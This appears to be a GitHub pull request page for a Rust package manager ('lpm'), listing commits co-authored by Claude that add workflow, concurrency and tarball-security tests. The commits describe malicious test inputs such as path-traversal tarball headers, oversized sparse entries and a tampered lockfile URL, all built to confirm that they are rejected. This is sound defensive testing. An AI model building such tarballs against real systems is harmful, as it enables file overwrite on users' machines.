clean, fancy-regex empty, 6454/6454 nextest pass (was 6449 pre-tranche;
+5 for the new tests). Full file 0.2s wall-clock for all 10 tests.

Item 3 now COMPLETE (10/10).

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* test(workflows): cross-command flows Item 4 — migrate→rebuild + workspace filter isolation

Closes Item 4 of the test-coverage-followup-plan at 6/6 (target was
≥5). Two additions to tests/workflows/tests/cross_command_flows.rs:

- Plan #1 — extended flow_migrate_install_audit_lockfile_round_trips
  with a `lpm rebuild --dry-run --policy=deny` step. Pins the full
  migrate → install → audit → rebuild lifecycle. Asserts the rebuild
  step exits 0 + does not mutate the post-audit state (lpm.lock +
  lpm.lockb still present). Catches regressions where rebuild's
  lockfile or build-state parser breaks against a freshly-migrated
  manifest.

- Plan #5 — added flow_workspace_install_filter_member_a_does_not_mutate_member_b
  (new test, 159 LOC). Pins the workspace-member isolation contract
  using the workspace-monorepo fixture (3 members: app, core,
  utils):
    1. Initial filtered install on @test/core (re-pinning its
       existing semver dep) populates core's per-member quadruple:
       lpm.lock=319 B, lockb=230 B, install_hash=118 B.
    2. Snapshot core's full quadruple.
    3. Run `lpm install chalk@5.3.0 --filter @test/app` to add a
       new dep to app ONLY.
    4. Assert app's package.json gained chalk; core's quadruple
       (package.json + lpm.lock + lpm.lockb + install-hash) is
       BYTE-IDENTICAL post-install; chalk does NOT appear in
       core's node_modules/.

  Catches a regression where a per-member filtered install
  accidentally also mutates a sibling member's package.json /
  lockfile / install-hash — a real bug class because run_install_filtered_add
  shares the workspace-root project lock (added in #77 fix) and
  could over-snapshot if the target-set computation drifts.

  Helper `mount_pkg_full(mock, name, version)` factors out the
  three-step metadata + batch-metadata + tarball mount so the
  test body stays readable.

Other 4 plan flows already covered pre-tranche:
- Plan #2: flow_add_install_graph_added_dep_visible
- Plan #3: flow_install_patch_patch_commit_install_persists_patch
- Plan #4: flow_token_rotate_publish_dry_run_picks_new_token
- Plan #6: flow_install_upgrade_major_audit_picks_new_version

Pre-merge gate green: clippy --workspace --all-targets clean, fmt
clean, fancy-regex empty, 6455/6455 nextest pass (was 6454; +1 for
the new flow). Plan #5 stable across 5/5 reruns at ~0.11s each.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* test(install): LPM_TEST_PANIC_AT hook + B.4 panic-rollback contract

Adds a deterministic panic-injection hook to the install pipeline +
unblocks the long-deferred B.4 contract test for ManifestTransaction
Drop-based rollback on panic.

The hook (`maybe_test_panic(stage)` in
crates/lpm-cli/src/commands/install.rs) reads LPM_TEST_PANIC_AT and
panics when the env value matches the stage name. Gated to
`cfg!(debug_assertions) || LPM_TEST_MODE=1` — same pattern as the
#78 retry-backoff override. Production builds without LPM_TEST_MODE=1
silently treat the env as no-op.

Wired 4 stages in `run_add_packages`:
- "after-snapshot" — manifest unchanged; Drop is no-op
- "after-stage" — placeholder `*` written to package.json (load-bearing)
- "after-install" — pipeline complete; manifest still has `*`
- "after-finalize" — concrete versions written; pre-commit only

The hook unblocks B.4 (`install_panics_mid_pipeline_rollback_restores_manifest`),
deferred since the original Item 2 tranche because there was no
deterministic way to trigger a panic mid-install from a workflow
test. Recoverable errors fire `?`-rollback (covered by E.1/E.2/E.3);
SIGKILL bypasses Drop entirely (B.1/B.2/B.3 cover that). The panic
path was the missing rollback proof.

B.4 sets LPM_TEST_PANIC_AT=after-stage and asserts:
- process exits non-zero (panic propagates to runtime)
- stderr contains `"panicked at"` AND `"LPM_TEST_PANIC_AT=after-stage"`
- package.json BYTE-IDENTICAL to pre-stage (Drop ran on unwind, snapshot
  bytes restored — load-bearing)
- the new pkg is NOT in dependencies (placeholder rollback worked)
- .lpm/install-hash absent (invalidate-on-rollback)
- lpm.lock absent (matched optional snapshot's None pre-state)

Catches a regression where:
- panic = "abort" added to release profile (no Drop on panic)
- ManifestTransaction Drop logic stops restoring snapshot bytes
- The `lpm install` snapshot+commit window grows without re-wiring Drop

Test runs in 0.07s warm. 5/5 stable across reruns.

Pre-merge gate green: clippy --workspace --all-targets clean, fmt
clean, fancy-regex empty, 6456/6456 nextest pass (was 6455; +1 for B.4).
install_concurrency now at 19/19. Item 2 of test-coverage-followup-plan
moves to 19/21 — only A.2 (no contract) and D.3 (needs container
infra) remain deferred indefinitely.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* fix(workflows): align MockRegistry tarball URL shape with production /-/ gate

Workflow tests mounted tarballs at `/tarballs/{name}-{version}.tgz` —
missing the `/-/` path segment that the registry-client's `evaluate_cached_url`
gate at [crates/lpm-registry/src/client.rs#L4117] requires (`.tgz` suffix
AND `/-/` substring). The gate is a defense-in-depth check that blocks
the H1 auth-token leak: a tampered lockfile URL like `/api/admin/foo.tgz`
(no `/-/`) would otherwise attach the bearer to a non-registry endpoint.

The mismatch produced two test-environment side effects that don't manifest
in production:

1. **WARN noise**: every install test that read a tarball URL from the
   lockfile fast path logged `cached tarball URL for X@Y failed shape check;
   falling back to on-demand lookup`. Polluted stderr across the suite.
2. **`shape_mismatch_count` defeated**: the registry-client documents this
   counter as a "BUG signal — the writer should never emit a gate-rejectable
   URL". Test runs incremented it on every install, making the counter
   useless for catching real bugs.

This commit migrates the mock to the production-shape
`/tarballs/{name}/-/{name}-{version}.tgz` everywhere — both the helper
methods (`MockRegistry::tarball_path` / `tarball_url`) and the ~60
hard-coded `format!` sites across 14 test files + 1 snapshot.

The new `tarball_path` helper is `pub` with a prominent docstring warning
future test authors not to re-introduce the legacy shape. Internal mounts
in `with_package_and_deps` / `with_package_published_at` /
`with_full_package_metadata` all route through it.

Post-fix verification: WARN gone, gate `Accepted` path runs, all 691
lpm-workflows tests pass (0 leaky in the latest full-workspace run, down
from 1-3 leaky pre-fix — fewer fallback paths firing).

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* test(workflows): test-coverage-followup tranche — Items 2/3/4/5

Closes the remaining open rows from `private/test-coverage-followup-plan.md`
across four items. ~2,600 LOC of new test code + fixture + budget infra.

**Item 3 — tarball-security additional candidate surfaces (7 tests
in `tarball_security.rs`):**

- `tarball_with_pax_path_traversal_rejected` — PAX extended `path`
  header smuggling `..` is rejected by the extractor's `Component::ParentDir`
  check after the tar crate resolves the override.
- `tarball_with_gnu_longname_traversal_rejected` — symmetric GNU `L`
  entry; same rejection path.
- `tarball_rejects_or_rolls_back_when_later_entry_is_malicious` — pins
  the `rollback_extraction` contract: valid first entry is cleaned up
  when a later `..`-traversal entry trips rejection mid-stream.
- `tarball_with_duplicate_member_path_rejected_or_deterministic` — pins
  current last-write-wins contract (defensible; flagged scanner-
  disagreement risk in test comment).
- `tarball_with_truncated_gzip_rolls_back_partial_extract` — half-
  truncated gzip stream → libdeflate fails cleanly → no partial extract.
- `tarball_ignores_uid_gid_ownership_metadata` (POSIX) — bogus uid/gid
  in tar header is ignored; extracted files owned by process uid.
- `tarball_with_sparse_huge_file_rejected_by_declared_size` — manually-
  constructed tarball with header declaring `MAX_FILE_SIZE + 1` and
  empty on-wire body; extractor rejects on the pre-check at lib.rs:306
  before draining body.

**Item 4 — cross-command flows additional candidate surfaces (2 tests
in `cross_command_flows.rs`):**

- `flow_install_uninstall_install_graph_round_trip` — pins manifest /
  link / graph hand-off through a full round-trip.
- `flow_cache_clean_then_offline_install_uses_store_or_fails_helpfully` —
  pins the cache/store boundary: `cache clean` must not corrupt offline
  install; store-side bytes byte-identical after a clean.

**Item 2 — concurrency/recovery additional candidate surfaces (3 tests
in `install_concurrency.rs`):**

- `cache_clean_during_slow_tarball_install_does_not_corrupt_install`
  (G.4) — install + cache clean run concurrently (different lock paths,
  no serialization); install succeeds despite metadata cache wipe
  mid-stream. Empirical timing observed: install elapsed 1.57s, cache
  clean fired at t=30-39ms cleanly inside the install window.
- `install_panics_after_install_hash_write_rollback_invalidates_hash`
  (G.5) — reuses existing `LPM_TEST_PANIC_AT=after-install` stage (no
  new source-side hook needed — `write_post_install_v6_hash` runs
  inside `run_with_options` which returns BEFORE that stage fires).
  Pins that Drop-based rollback restores manifest AND deletes the
  freshly-written install-hash.
- `malformed_registry_json_fails_without_manifest_or_lockfile_mutation`
  (G.6) — truncated JSON on all three metadata endpoints; install
  fails cleanly, no panic/backtrace, package.json byte-identical, no
  torn lockfile.

**Verdaccio-npm parity for `which@4.0.0`
(`install_real_registry.rs`):**

- `verdaccio_npm_parity_for_bin_package_pins_metadata_and_shim_presence`
  — extends the existing lodash byte-diff with a bin-shipping target
  package. Asserts metadata equivalence + `.bin/<name>` shim present
  on both sides + bin target file materialized + exec bits non-zero
  (POSIX).

**Item 5 — realworld fidelity (new fixture + new test file):**

- `tests/fixtures/realworld-nextjs/` (package.json + README) — pinned
  Next.js 14.2.13 + React 18.3.1 + TypeScript 5.6.3 + 3 `@types/*`
  packages. Resolves to ~28 transitive deps empirically. README
  documents the calibration methodology including raw measurement data.
- `tests/workflows/tests/install_realworld.rs` — `install_realworld_nextjs_fixture_succeeds_through_verdaccio`
  installs the fixture through Verdaccio→npmjs and asserts end-to-end
  success at production scale. Always logs cold + warm wall-clock + peak
  RSS to stderr for calibration data.
- **`LPM_BUDGET_GATE=1`-gated budget assertions**: cold ≤ 25s, warm ≤
  25ms, cold peak RSS ≤ 1500 MiB. Calibrated from N=6 cold + N=3 warm +
  N=3 RSS runs on M-series macOS, 2026-05-14. Memory measurement via
  `/usr/bin/time -l` (macOS) / `-v` (Linux); Windows skips with a clear
  warning.

This closes Item 5 entirely (all 4 acceptance criteria green) and brings
Items 2/3/4 to the parked-by-design or infrastructure-blocked baseline.

CI gate: clippy `--workspace --all-targets -- -D warnings` clean, fmt
clean, fancy-regex empty, build clean, `cargo nextest run --workspace`
6471/6471 pass. Suite runtime ~2:40 (was ~2:24 pre-tranche; +15s for the
realworld test).

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* fix(workflows): collapse Linux-only let-chain in parse_peak_rss

CI lint on Linux failed on `clippy::collapsible_if` in the Linux-cfg'd
branch of `parse_peak_rss`. The macOS branch had an intermediate
`let bytes_str = rest.trim();` between the two `if let`s, which is why
the local clippy run on macOS didn't catch this — only the macOS-cfg
branch compiled there.

Collapse the Linux branch to use `&&` (stable let-chains) so it
satisfies the lint while preserving the same semantics.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
tolgaergin added a commit that referenced this pull request May 16, 2026
Strip phase numbers, trial labels, and date stamps from comments per
the comment-cleanup plan. Keep all load-bearing technical content
(libdeflate rationale, parent-dir memoization, exec-bit handling,
0o644-floor normalization). Pure comment edits, no code changes.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
tolgaergin added a commit that referenced this pull request May 16, 2026
tolgaergin added a commit that referenced this pull request May 16, 2026
Strip phase/trial/audit-finding labels and date stamps from comments,
rewrite the surviving doc blocks to be concise and load-bearing.
Pure comment edits, no code changes. Net −154 lines.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
tolgaergin added a commit that referenced this pull request May 16, 2026
Strip phase/audit-finding labels and date stamps; rewrite doc blocks
to be concise and load-bearing. Rename ambiguous `Phase 1/2/3/4`
intra-linker pipeline references to `Stage 1/2/3/4` so they don't
read like roadmap-phase numbers. Pure comment edits, no code changes.
Net −70 lines.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

1 participant